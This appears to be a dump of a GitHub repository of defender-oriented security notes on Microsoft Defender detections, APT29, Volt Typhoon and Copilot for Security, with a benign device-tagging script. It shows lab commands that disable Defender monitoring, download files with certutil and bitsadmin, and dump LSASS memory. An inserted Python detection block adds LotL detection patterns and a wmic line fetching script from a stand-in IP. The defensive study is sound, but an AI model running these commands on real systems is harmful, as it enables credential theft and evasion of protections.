├── SecurityResearcher-Note-Folder ├── Day12-Volt-Typhoon-Base64.pdf ├── Day03-Microsoft-ThreatActorNamingTaxonomy.md ├── Day18-LotL-detection-part1.md ├── MDE-APIcallSimu.ps1 ├── Day12-Volt-Typhoon-Base64.md ├── Day02-APT29-Part1-Overview.md ├── Day01-Basic-Malware-Analysis.md ├── Day17-Hunting-APIcalls-insight.md ├── Day04-Mango-Sandstorm-Part2-AttackTechniques-Insights.md ├── Day11-MalwareAnalysis-Insights-part2.md ├── Day04-Mango-Sandstorm-Part1-Overview.md ├── Day06-M365D-XDR-AutomaticAttackDisruption.md ├── Day04-Mango-Sandstorm-Part3-AttackTechniques-Insights.md ├── Day02-APT29-Part4-Midnight-Blizzard-MDE-EvaluationLab.md ├── Day14-macOS-SIP-Bypass-Insights.md ├── Day02-APT29-Part2-Midnight-Blizzard.md ├── Day16-CloudId-Exfiltration-AttackReport-Part2.md ├── Day16-CloudId-Exfiltration-AttackReport-Part1.md ├── Day11-MalwareAnalysis-Insights-part1.md ├── Day13-WDigest-credential-harvesting-attack.md ├── Day05-AntivirusConfig-Tips.md ├── Day07-AiTM-Insights-XDR.md ├── Day02-APT29-Part3-Midnight-Blizzard.md ├── Day10-XDR-Insights-part2.md ├── Day08-WebShell-Insights-XDR.md ├── Day09-XDR-Insights-part1.md ├── Day19-ThreatActor-Discovery.md └── Day15-XDR-Insights-2024update.md ├── ProductResearch-Note-Folder ├── Day04-MDI-DeploymentConsiderations.pdf ├── Day03-MDO-FileDetonation-DeepAnalysis.md ├── Day01-MDE-MDI-BetterTogether-Part1.md └── Day02-MDE-MDI-BetterTogether-Part2.md ├── CopilotLOGs ├── 02-CopilotForSecurity-Architecture.md └── 01-CopilotForSecurity-History.md └── README.md /SecurityResearcher-Note-Folder/Day12-Volt-Typhoon-Base64.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LearningKijo/SecurityResearcher-Note/HEAD/SecurityResearcher-Note-Folder/Day12-Volt-Typhoon-Base64.pdf -------------------------------------------------------------------------------- /ProductResearch-Note-Folder/Day04-MDI-DeploymentConsiderations.pdf: 
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/LearningKijo/SecurityResearcher-Note/HEAD/ProductResearch-Note-Folder/Day04-MDI-DeploymentConsiderations.pdf
--------------------------------------------------------------------------------
/CopilotLOGs/02-CopilotForSecurity-Architecture.md:
--------------------------------------------------------------------------------
1 | # Microsoft Copilot for Security : LOG-02
2 | Over the past year we have all heard the terms Generative AI, OpenAI, ChatGPT, and Copilot.
3 | Let's sort them out. I worked out the differences from Microsoft Docs and by asking ChatGPT and Copilot.
4 | - [x] Generative AI : A class of AI models that generate new content, such as text, images, or music, from patterns learned in existing data.
5 | - [x] OpenAI : The research organization that develops AI models, including ChatGPT.
6 | - [x] ChatGPT : A specific conversational AI model developed by OpenAI.
7 | - [x] Microsoft Copilot for Security : A generative AI-powered security solution that increases the efficiency and capabilities of defenders to improve security outcomes at machine speed and scale, while complying with responsible AI principles.
8 | > Source :
9 | > [What is Microsoft Security Copilot?](https://learn.microsoft.com/en-us/security-copilot/microsoft-security-copilot), [ChatGPT](https://openai.com/blog/chatgpt), Copilot
10 |
11 |
12 | ## Core Engines
13 | As far as I know, Microsoft Copilot for Security rests on two big pillars.
14 | - GPT-4 model from OpenAI
15 | - Microsoft-developed security model
16 | - Global threat intelligence (More than 65 trillion daily signals) 17 | - Microsoft Security products (Plugins) 18 | - Third-party security products (Plugins) 19 | 20 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/4c3331c6-6fb5-437a-beaa-a762db516453) 21 | > The infographic is available from [Microsoft Copilot for Security | Microsoft Security](https://www.microsoft.com/en-us/security/business/ai-machine-learning/microsoft-copilot-security) 22 | 23 | ## Architecture 24 | This is a high-level architecture diagram illustrating how Security Copilot works. 25 | 26 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/eeea60a3-92e8-4ba9-b2ea-c756fa7fb75d) 27 | > The graph is available from Microsoft Docs - [What is Microsoft Security Copilot?](https://learn.microsoft.com/en-us/security-copilot/microsoft-security-copilot) 28 | 29 | I came across some new words and looked up their meanings. 30 | - [x] Azure OpenAI : Azure OpenAI Service provides REST API access to OpenAI's powerful language models including the GPT-4, GPT-4 Turbo with Vision, GPT-3.5-Turbo, and Embeddings model series. 31 | - [x] LLM : Large Language Model (LLM) is a sophisticated AI system trained on vast amounts of text data to understand and generate human-like language across various tasks. 32 | - [x] Responsible AI : Approach to developing, assessing, and deploying AI systems in a safe, trustworthy, and ethical way. 33 | 34 | > Source : 35 | > [What is Azure OpenAI Service?](https://learn.microsoft.com/en-us/azure/ai-services/openai/overview), [What is Responsible AI?](https://learn.microsoft.com/en-us/azure/machine-learning/concept-responsible-ai?view=azureml-api-2), [ChatGPT](https://openai.com/blog/chatgpt) 36 | 37 | #### Disclaimer 38 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company. 
39 |
--------------------------------------------------------------------------------
/SecurityResearcher-Note-Folder/Day03-Microsoft-ThreatActorNamingTaxonomy.md:
--------------------------------------------------------------------------------
1 | # Day 3 - Microsoft, a threat actor naming taxonomy
2 | ![image](https://user-images.githubusercontent.com/120234772/233586114-ba90b790-81f2-4739-b5f6-cba034e4ddf1.png)
3 |
4 | ### Why did Microsoft switch to using weather-themed names for threat actors?
5 | The threat landscape is constantly evolving, with the complexity, scale, and volume of threats increasing. As highlighted in [the blog](https://www.microsoft.com/en-us/security/blog/2023/04/18/microsoft-shifts-to-a-new-threat-actor-naming-taxonomy/), the Microsoft Threat Intelligence community has tracked 300+ threat actors, including 160 nation-state actors and 50 ransomware groups, over a decade, discovering, tracking and identifying targeted malicious activity and sharing critical intelligence with customers. ***To provide better context and make it easier for security professionals to understand and prioritize threats***, Microsoft adopted a new threat actor naming taxonomy based on weather: the family name (Typhoon, Blizzard, Sandstorm, and so on) denotes the country of origin or the motivation, and the adjective in front of it identifies the specific group.
6 |
7 | ![image](https://user-images.githubusercontent.com/120234772/233846294-a4ae4e61-0fe3-4866-bfff-2de842d73ce5.png)
8 | > e.g. a threat actor naming taxonomy, [How Microsoft names threat actors](https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide)
9 |
10 | ## The comprehensive map
11 | The comprehensive map is available from [here](https://download.microsoft.com/download/4/5/2/45208247-c1e9-432d-a9a2-1554d81074d9/microsoft-threat-actor-list.xlsx).
12 | 13 | ![image](https://user-images.githubusercontent.com/120234772/233592868-e35ed554-c0bf-4688-9656-b74c3df7719b.png) 14 | 15 | ## Threat Actor Insights 16 | In Threat Actor Insights, [Cybersecurity + Threat Intelligence | Security Insider](https://www.microsoft.com/en-us/security/business/security-insider/#office-ContentAreaHeadingTemplate-hkzu7ix) page, you can access advanced insights into threat actors, including their target industries, characteristics, detailed security reports, and more. 17 | 18 | ![image](https://user-images.githubusercontent.com/120234772/233085458-3ab6f1ac-8dae-4cc3-bb57-ac121cc84e52.png) 19 | > Threat Actor Insights 20 | 21 | ![image](https://user-images.githubusercontent.com/120234772/233846054-0c658312-1fe3-49fe-9271-884338448be7.png) 22 | > Target industries, characteristics and so on 23 | 24 | ![image](https://user-images.githubusercontent.com/120234772/233846069-dba7baa8-09d2-498d-a549-efbf1adb356d.png) 25 | > Detailed security reports 26 | 27 | ## Reference 28 | 1. [How Microsoft names threat actors](https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide) (https://aka.ms/threatactors) 29 | 2. [Microsoft shifts to a new threat actor naming taxonomy](https://www.microsoft.com/en-us/security/blog/2023/04/18/microsoft-shifts-to-a-new-threat-actor-naming-taxonomy/) 30 | 3. [Cybersecurity + Threat Intelligence | Security Insider](https://www.microsoft.com/en-us/security/business/security-insider/#office-ContentAreaHeadingTemplate-hkzu7ix) 31 | 32 | #### Disclaimer 33 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company. 
34 |
--------------------------------------------------------------------------------
/SecurityResearcher-Note-Folder/Day18-LotL-detection-part1.md:
--------------------------------------------------------------------------------
1 | # LotL techniques with MDE detection - Part 1
2 | Hello everyone,
3 |
4 | For a long time I have seen Living off the Land (LotL) techniques discussed in Microsoft Security blogs, and recently I have been learning various attack techniques, especially those related to LotL.
5 | That's why I believe this is a great time to share my learning and detection insights in MDE through this blog.
6 |
7 | ### What is living off the land ?
8 |
9 | The [Microsoft Security blog](https://www.microsoft.com/en-us/security/blog/2018/09/27/out-of-sight-but-not-invisible-defeating-fileless-malware-with-behavior-monitoring-amsi-and-next-gen-av/) describes “living off the land” as malware that uses only resources already available in the operating system: built-in, signed binaries and scripting engines instead of a dropped executable, which leaves little for file-based antivirus to scan.
10 |
11 | I will show how attackers have used LotL techniques, based on past Microsoft Security blogs.
12 |
13 |
14 | ### [Astaroth “living-off-the-land”](https://www.microsoft.com/en-us/security/blog/2019/07/08/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack/)
15 | This is a somewhat older blog, but I love it because the attack flow chains several Windows LotL binaries:
16 |
17 | 1. LNK
18 | 2. WMI
19 | 3. Bitsadmin
20 | 4. Certutil
21 |
22 | **LNK** : One common pattern is a LNK (shortcut) file whose target path runs a PowerShell command that downloads and executes a malicious script from the internet.
23 |
24 | **WMI** : WMIC queries the operating system for specific properties and formats the output with a format file. The `/format:` switch accepts an XSL stylesheet from a URL, and that stylesheet can carry script, so `wmic ... /format:"https://..."` becomes a remote code download and execution primitive without writing a new binary to disk.
25 |
26 | **Bitsadmin / Certutil** : bitsadmin and certutil are legitimate Windows tools that can fetch files from a URL (bitsadmin can also create upload jobs, and certutil can decode Base64 and hex), so attackers use them for payload delivery and for moving data to and from command-and-control (C2) infrastructure. In the Astaroth chain, bitsadmin downloaded the encoded payloads and certutil decoded them.
27 |
28 | ![image](https://github.com/user-attachments/assets/f3ba69a1-f9bf-4300-9b03-551917f9875f)
29 | > Astaroth “living-off-the-land” attack chain showing multiple legitimate tools abused
30 | ---
31 |
32 | ## Microsoft Defender for Endpoint detection alerts
33 |
34 | **Test commands**
35 | ```cmd
36 | wmic process call create "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \"Set-MpPreference -DisableRealtimeMonitoring 1\""
37 | wmic process get caption,executablepath,commandline /format:csv > %Temp%\commands.csv
38 | wmic useraccount get /ALL /format:csv > %Temp%\UserAccounts.csv
39 | wmic qfe get description,installedOn /format:csv > %Temp%\installedapp.csv
40 | wmic process call create "cmd.exe /c certutil -urlcache -f \"https://aka.ms/ioavtest\" \"%TEMP%\\validatecloud.exe\""
41 | wmic process call create "cmd.exe /c bitsadmin /transfer mydownloadjob /download /priority high \"https://aka.ms/ioavtest\" \"%TEMP%\\validatecloud.exe\""
42 | ```
43 |
44 | ***The pentest device was protected by Defender Antivirus and Microsoft Defender for Endpoint, with Tamper Protection turned on.*** Run these only on a lab device: the first command tries to switch off real-time monitoring, which Tamper Protection blocks, and the certutil and bitsadmin commands pull Microsoft's IOAV test file, which is designed to be detected rather than to do harm.
45 |
46 | MDE raised the following alerts. Read against the commands above, the two discovery alerts and the account lookup correspond to the `wmic ... get` queries, the WMI process creation alert to `wmic process call create`, and the BITSAdmin and living-off-the-land binary alerts to the bitsadmin and certutil downloads.
47 | - Suspicious Process Discovery
48 | - Suspicious User Account Discovery
49 | - Anomalous account lookups
50 | - Suspicious WMI process creation
51 | - Suspicious file creation by BITSAdmin tool
52 | - Use of living-off-the-land binary to run malicious code
53 | - Suspicious behavior by cmd.exe was observed
54 |
55 | ![image](https://github.com/user-attachments/assets/ef4c422e-d4c9-482a-84cc-1c4ab75e46eb)
56 |
57 | ![image](https://github.com/user-attachments/assets/b58e251a-ca2f-4df5-9d4a-47dc51a5a747)
58 |
59 | #### Disclaimer
60 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company.
61 |
--------------------------------------------------------------------------------
/SecurityResearcher-Note-Folder/MDE-APIcallSimu.ps1:
--------------------------------------------------------------------------------
1 | #Replace "XXXXXXXXXXXXXXXXXXXX" with the appropriate IDs relevant to your tenant/application (quotes required)
2 | #A client secret in a script is a credential on disk: outside a lab, use certificate-based auth or read the secret from a vault at run time
3 | $appId = "XXXXXXXXXXXXXXXXXXXX"
4 | $appSecret = "XXXXXXXXXXXXXXXXXXXX"
5 | $tenantId = "XXXXXXXXXXXXXXXXXXXX"
6 |
7 | Write-Host "+++ MDE device tag with API calls +++"
8 |
9 | #Connect to Microsoft Graph (used for the advanced hunting query)
10 | $SecuredPasswordPassword = ConvertTo-SecureString -String $appSecret -AsPlainText -Force
11 | $ClientSecretCredential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $appId, $SecuredPasswordPassword
12 | Connect-MgGraph -TenantId $tenantId -ClientSecretCredential $ClientSecretCredential -NoWelcome
13 |
14 | #Get a separate token for the MDE API (api.securitycenter.microsoft.com); a Graph token is not accepted there
15 | $resourceAppIdUri = 'https://api.securitycenter.microsoft.com'
16 |
17 | $oAuthUri = "https://login.microsoftonline.com/$tenantId/oauth2/token"
18 | $body = [Ordered] @{
19 |     resource = "$resourceAppIdUri"
20 |     client_id = "$appId"
21 |     client_secret = "$appSecret"
22 |     grant_type = 'client_credentials'
23 | }
24 |
25 | try {
26 |     $response = Invoke-RestMethod -Method Post -Uri $oAuthUri -Body $body -ErrorAction Stop
27 |     $aadToken = $response.access_token
28 |     Write-Host "Succeeded to get token value --------------------------------------------------- [ OK ]" -ForegroundColor Green
29 | } catch {
30 |     #Stop here: without a token every tag call below would fail with 401
31 |     throw "Token request failed: $($_.Exception.Message)"
32 | }
33 |
34 | #Advanced Hunting Query
35 | $query = 'DeviceInfo | where OSPlatform in ("Windows10", "Windows11") | summarize arg_max(Timestamp, *) by DeviceId, DeviceName'
36 |
37 | #Convert the query to JSON
38 | $body = @{
39 |     Query = $query
40 | } | ConvertTo-Json
41 |
42 | #Invoke Microsoft Graph security API
43 | $result = Invoke-MgGraphRequest -Method POST -Uri "https://graph.microsoft.com/v1.0/security/runHuntingQuery" -Body $body
44 |
45 | #Display the results
46 | $table = $result.results | ForEach-Object {
47 |     [PSCustomObject]@{
48 |         DeviceId = $_.DeviceId
49 |         DeviceName = $_.DeviceName
50 |     }
51 | }
52 |
53 | #Check the value of the DeviceId
54 | If ($null -eq $table) {
55 |     Write-Host "No value from AH query -------------------------------------------------------- [ NO ]" -ForegroundColor Yellow
56 | } else {
57 |     Write-Host "Succeeded to get AH query + value ---------------------------------------------- [ OK ]" -ForegroundColor Green
58 | }
59 |
60 | #Show device id value in table
61 | $counter = 1
62 | Foreach ($getMachine in $table) {
63 |     Write-Host " +-- [$counter] Device ID:" $getMachine.DeviceId ", Name:" $getMachine.DeviceName
64 |     $counter++
65 | }
66 |
67 | Write-Host ""
68 |
69 | #Tagging devices
70 | Write-Host "--- MDE API call to tag devices ---"
71 |
72 | Foreach ($machine in $table.DeviceId) {
73 |
74 |     #Crude rate limiting: the MDE API throttles bursts of calls
75 |     Start-Sleep -Seconds 3
76 |
77 |     $url = "https://api.securitycenter.microsoft.com/api/machines/" +$machine+ "/tags"
78 |     $headers = @{
79 |         'Content-Type' = 'application/json'
80 |         Accept = 'application/json'
81 |         Authorization = "Bearer $aadToken"
82 |     }
83 |     $tag= @{
84 |         'Value' = 'Ninja'
85 |         'Action' = 'Add'
86 |     }
87 |
88 |     #Build the request body (Action can be 'Add' or 'Remove'); print $body here if you want to see what is sent
89 |     $body = ConvertTo-Json -InputObject $tag
90 |
91 |     try {
92 |         $response = Invoke-WebRequest -Method Post -Uri $url -Headers $headers -Body $body -ErrorAction Stop
93 |         Write-Host "Succeeded to tag [$($tag['Value'])] : $machine ------------ [ OK ]" -ForegroundColor Green
94 |     } catch {
95 |         #Error handling: report and continue with the next device
96 |         Write-Error "$($_.Exception.Message)"
97 |     }
98 | }
99 |
100 | Write-Host "--- END ---"
101 |
--------------------------------------------------------------------------------
/SecurityResearcher-Note-Folder/Day12-Volt-Typhoon-Base64.md:
--------------------------------------------------------------------------------
1 | # Day 12 - Base64 decode & Volt Typhoon insights
2 | Volt Typhoon is a state-sponsored actor based in China that targets critical infrastructure in the United States. Its activity focuses on espionage and information gathering and relies on living-off-the-land techniques and hands-on-keyboard activity. Here is the Volt Typhoon attack diagram with comments. If you are interested in a detailed attack technique breakdown, you can find it in [this blog](https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/).
3 |
4 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/14592722-1c46-4b47-84a0-5cd16de1277c)
5 |
6 | > Volt Typhoon attack diagram with comments
7 |
8 | ## Credential access : [Base64 Encode to Decode]
9 | During the credential access phase, Volt Typhoon used a Base64-encoded PowerShell command to dump credentials from the memory of the Local Security Authority Subsystem Service (LSASS) process.
10 |
11 | In this analysis, I would like to provide a high-level mapping of the logic and the attack details of the LSASS dump command as described in the Microsoft Security blog.
12 | Additionally, I will demonstrate how to encode the command as Base64.
13 |
14 | #### LSASS dump command - Simulation
15 | The command tells cmd.exe to run rundll32.exe, which loads comsvcs.dll and calls its exported MiniDump function with the process ID of lsass.exe.
16 | The result is a full memory dump of LSASS written to C:\temp\out.dmp. Credentials can then be extracted from that file offline (for example with Mimikatz), so the dump file itself, not just the running process, has to be treated as sensitive.
17 |
18 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/5092cda1-e588-4c1a-84e3-a1a51b5eb6d5)
19 |
20 |
21 | #### LSASS dump command - Volt Typhoon
22 | [Volt Typhoon](https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/) - command to dump LSASS process memory, encoded in Base64
23 |
24 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/324286fe-fe00-4735-bf56-1ddcd2546923)
25 |
26 |
27 | #### Encode the command to perform an LSASS dump with Base64 in PowerShell
28 | PowerShell's -EncodedCommand parameter expects the Base64 encoding of the script's UTF-16LE bytes (what .NET calls the Unicode encoding), so a Base64 string made from UTF-8 bytes will not run.
29 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/7039875e-fbc1-4086-8105-d51fd3f42eb1)
30 |
31 |
32 | ## Microsoft Defender for Endpoint detection
33 | After running the encoded script on the device, two alerts were generated within a few minutes and were combined into one incident.
34 | One of the great capabilities of Microsoft Defender for Endpoint is that it decodes the Base64-encoded command line and shows the decoded command on the alert page, so the analyst does not have to decode it by hand.
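The following is an added example, not code from this note or from the Day 18 LotL note: a small hunting pass over Windows process-creation events that decodes a PowerShell -EncodedCommand value the way PowerShell does (Base64 over UTF-16LE, the encoding step shown above) and then flags the living-off-the-land patterns used in the Day 18 test commands and in the Volt Typhoon LSASS dump. All events are constructed for the example; the field names follow MDE's DeviceProcessEvents, the process ID 624 and the IP 203.0.113.10 are made up, and the rule regexes are my own, not Defender's detection logic.

```python
# Added example (not code from the original notes): decode PowerShell encoded
# commands and flag LotL patterns over constructed process-creation events.
import base64
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -en, -enc, ...);
# -ec is also commonly seen in the wild and is accepted here too (assumption).
ENC_SWITCH = re.compile(r"(?:^|\s)-(?:e|ec|en[a-z]*)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

def encode_powershell_command(script: str) -> str:
    """Return the value PowerShell expects after -EncodedCommand: Base64 over UTF-16LE bytes."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded script if the command line carries an encoded command, else ''.
    Decoding as UTF-16LE is the step a naive UTF-8 decode gets wrong: that leaves a NUL
    after every ASCII character, which is why a KQL base64_decode_tostring result can
    look empty or truncated in the results pane."""
    m = ENC_SWITCH.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""

# (rule name, regex applied to the original command line plus any decoded payload)
LOLBIN_RULES = [
    ("WMI process creation", r"\bwmic(?:\.exe)?\b.*\bprocess\s+call\s+create\b"),
    ("WMIC remote XSL via /format", r"\bwmic(?:\.exe)?\b.*/format:\s*\"?https?://"),
    ("Certutil download (-urlcache)", r"\bcertutil(?:\.exe)?\b.*-urlcache\b"),
    ("BITSAdmin transfer job", r"\bbitsadmin(?:\.exe)?\b.*/transfer\b"),
    ("Defender real-time monitoring disabled", r"Set-MpPreference\b.*-DisableRealtimeMonitoring\s+(?:1|\$true)\b"),
    ("LSASS dump via comsvcs!MiniDump", r"\bcomsvcs\.dll\b.*\bMiniDump\b"),
    ("Host or account discovery via WMIC", r"\bwmic(?:\.exe)?\b.*\b(?:useraccount|qfe|process\s+get)\b"),
]
COMPILED = [(name, re.compile(rx, re.IGNORECASE | re.DOTALL)) for name, rx in LOLBIN_RULES]

def analyse(cmdline: str) -> list:
    """Rule names that fire for one command line, encoded payload included."""
    text = cmdline + "\n" + decode_encoded_command(cmdline)
    return [name for name, rx in COMPILED if rx.search(text)]

def hunt(events: list) -> dict:
    """Map ReportId -> rule names for every event that fired at least one rule."""
    out = {}
    for ev in events:
        hits = analyse(ev["ProcessCommandLine"])
        if hits:
            out[ev["ReportId"]] = hits
    return out

# Constructed events: Day 18 test commands, an encoded LSASS dump in the Volt Typhoon
# style (PID 624 is made up), a WMIC /format download, and two benign command lines.
LSASS_DUMP = r"cmd /c rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 624 C:\temp\out.dmp full"
SAMPLE_EVENTS = [
    {"ReportId": 1, "ProcessCommandLine": 'wmic process call create "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \\"Set-MpPreference -DisableRealtimeMonitoring 1\\""'},
    {"ReportId": 2, "ProcessCommandLine": r"wmic useraccount get /ALL /format:csv > C:\Users\Public\UserAccounts.csv"},
    {"ReportId": 3, "ProcessCommandLine": r'wmic process call create "cmd.exe /c certutil -urlcache -f \"https://aka.ms/ioavtest\" \"C:\Temp\validatecloud.exe\""'},
    {"ReportId": 4, "ProcessCommandLine": r'wmic process call create "cmd.exe /c bitsadmin /transfer mydownloadjob /download /priority high \"https://aka.ms/ioavtest\" \"C:\Temp\validatecloud.exe\""'},
    {"ReportId": 5, "ProcessCommandLine": "powershell.exe -enc " + encode_powershell_command(LSASS_DUMP)},
    {"ReportId": 6, "ProcessCommandLine": 'wmic os get /format:"https://203.0.113.10/astaroth.xsl"'},
    {"ReportId": 7, "ProcessCommandLine": "wmic os get caption"},
    {"ReportId": 8, "ProcessCommandLine": r"certutil -hashfile C:\Temp\setup.exe SHA256"},
]

if __name__ == "__main__":
    for report_id, hits in hunt(SAMPLE_EVENTS).items():
        print(report_id, hits)
```

Event 5 only becomes visible once the encoded payload is decoded, which is the point of decoding before matching; events 7 and 8 are legitimate uses of the same binaries and fire nothing, which is the false-positive check any LotL rule needs.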
35 |
36 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/7a87e303-a152-4af0-84a1-3c67ac1460d2)
37 |
38 | > Microsoft Defender for Endpoint captured "Credential Dump"
39 |
40 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/3bbeeebb-ff89-48b9-a75f-a2e91d960d21)
41 |
42 | > Decoding the base64-encoded command line in Microsoft Defender for Endpoint
43 |
44 | The same decoding can be done in KQL with the [base64_decode_tostring()](https://learn.microsoft.com/en-us/azure/data-explorer/kusto/query/base64_decode_tostringfunction) function, so encoded command lines can be decoded inside an advanced hunting query.
45 | Below is an example of base64_decode_tostring, which may initially show the result as null.
46 | However, when you copy and paste it into a note, the entire command is displayed without any issues.
47 | The reason is the encoding: the -EncodedCommand value is UTF-16LE, so decoding it as UTF-8 leaves a null character after every ASCII character. The text is intact, as the copy and paste shows; the nulls are just not rendered.
48 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/b8b39d30-c710-45c8-a655-b3f0c29eb68a)
49 |
50 |
51 | #### Disclaimer
52 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company.
53 |
--------------------------------------------------------------------------------
/SecurityResearcher-Note-Folder/Day02-APT29-Part1-Overview.md:
--------------------------------------------------------------------------------
1 | # Day 2 - APT29 Overview
2 | While tracing back the history of APT29 (YTTRIUM) attacks, I had a few questions, and I hope that these questions and my curiosity will help someone with their security incident response. I will cover four points regarding APT29:
3 |
4 | 1. What is APT29
5 | 2. What is the main objective of APT29
6 | 3. APT29 associated groups
7 | 4. APT29 attack techniques
8 |
9 | ### APT29 attack blogs
10 | |# | Title| About|
11 | |:---|:---|:---|
12 | |1 | Day2-APT29-Overview.md (this note) | APT29 attack overview |
13 | |2 | [Day2-APT29-Part2-Midnight-Blizzard.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day2-APT29-Part2-Midnight-Blizzard.md)| APT29/Midnight Blizzard (previously YTTRIUM) |
14 | |3 | [Day2-APT29-Part3-Midnight-Blizzard.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day2-APT29-Part3-Midnight-Blizzard.md)| APT29/Midnight Blizzard (previously NOBELIUM) |
15 | |4 | [Day2-APT29-Part4-Midnight-Blizzard-MDE-EvaluationLab.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day2-APT29-Part4-Midnight-Blizzard-MDE-EvaluationLab.md) | APT29/Midnight Blizzard with demo|
16 |
17 | ## What is APT29 ?
18 | APT29 (Advanced Persistent Threat 29), also known as Cozy Bear, is a cyber espionage group believed to operate on behalf of the Russian government.
19 | It has been involved in high-profile attacks against government agencies and critical infrastructure, and is known for spear phishing, zero-day exploits, and social engineering.
20 |
21 | ## What is the main objective of APT29 ?
22 | > What is the main objective of APT29 ?
23 | > Is it to break the IT environment, obtain money, or steal personal information?
24 |
25 | The main objective of APT29, also known as Cozy Bear, is believed to be espionage and intelligence gathering for the Russian government. Their targets have included government entities, defense contractors, and research organizations, among others. While financial gain may be a secondary objective, their primary focus is on collecting sensitive information and intellectual property.
26 |
27 | ## APT29 associated groups
28 | MITRE ATT&CK lists several names associated with APT29. They are aliases that different vendors use for the same activity rather than separate groups, which matters when you correlate reports from more than one source.
29 | - IRON RITUAL
30 | - IRON HEMLOCK
31 | - NobleBaron
32 | - Dark Halo
33 | - StellarParticle
34 | - Midnight Blizzard (NOBELIUM, YTTRIUM)
35 | - UNC2452
36 | - The Dukes
37 | - Cozy Bear
38 | - CozyDuke
39 | >**Note** : [MITRE ATT&CK | APT29 ](https://attack.mitre.org/groups/G0016/)
40 |
41 | ## APT29 attack techniques
42 | ### The most common attack techniques
43 | 1. Spear-phishing emails
44 | 2. Watering hole attacks
45 | 3. Zero-day exploits
46 | 4. Remote access tools
47 | 5. Malware attacks
48 |
49 | Overall, APT29 is a highly sophisticated threat group that uses a combination of social engineering, advanced hacking techniques, and custom malware to gain access to target systems and steal sensitive information.
50 |
51 | ### MITRE ATT&CK APT29 attack map
52 | In the Cybereason blog, APT29 attack techniques are captured very well using the MITRE ATT&CK framework.
53 |
54 | ![image](https://user-images.githubusercontent.com/120234772/231052172-59b042b9-996a-4539-b6f3-09f493ad936e.png)
55 | > APT29 Evaluation: Technique scope. Credit: MITRE ATT&CK, [Cybereason](https://www.cybereason.com/blog/understanding-the-mitre-attck-apt29-round-2-evaluation)
56 |
57 | #### Disclaimer
58 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company.
59 | -------------------------------------------------------------------------------- /ProductResearch-Note-Folder/Day03-MDO-FileDetonation-DeepAnalysis.md: -------------------------------------------------------------------------------- 1 | # MDO File Detonation & Deep Analysis insight 2 | Hello, all defenders and threat hunters, and thank you for visiting my product research note. 3 | Most of the questions I receive regarding Microsoft Defender for Office 365 (MDO) relate to sandbox analysis, specifically, what we refer to as ***'File Detonation & Deep Analysis'***. 4 | For instance, there's curiosity about whether MDO genuinely examines an attachment within a sandbox environment, and if detonation indeed takes place. 5 | Additionally, there's a common inquiry about how one can test and validate that this process is functioning as intended. 6 | Therefore, today, I am thrilled to share insights into File Detonation & Deep Analysis, specifically focusing on Safe Attachments in MDO. 7 | 8 | ## Sample HTML Files 9 | To validate File Detonation & Deep Analysis initially, I created [some simple HTML-based attachments](https://github.com/LearningKijo/ResearchDev/tree/main/DEV01-RedirectAttachment). 10 | There are three different types of attachments, all functioning similarly — redirecting to a malicious download site after being opened for 5 seconds. 11 | The distinction lies in their respective HTML appearances. 12 | 13 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/8d72c037-b3bf-4409-82ab-f7804ef0998d) 14 | 15 | > HTML file templates 16 | 17 | At this point, I utilized [DEV01-Attachment-Type1.html](https://github.com/LearningKijo/ResearchDev/blob/main/DEV01-RedirectAttachment/DEV01-HTML/DEV01-Attachment-Type1.html) and sent an email to the targeted user with the attachment. 
18 | 19 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/181c09a7-d0d4-476b-95cc-11449c9dc5ea) 20 | 21 | ## Result - MDO Email Entity Page 22 | After a few minutes, MDO successfully detected the email as suspicious and moved it to quarantine. 23 | When you examine the "Detection technology" section, you can see ***"File Detonation"***, confirming that the email was flagged as a result of "File Detonation". 24 | I would also like to share the official document here to provide the definition of "File Detonation". 25 | 26 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/0b1279d2-dba4-4abd-bb98-006e3467d015) 27 | 28 | > [!Note] 29 | > ***File detonation : Safe Attachments detected a malicious attachment during detonation within a sandbox***
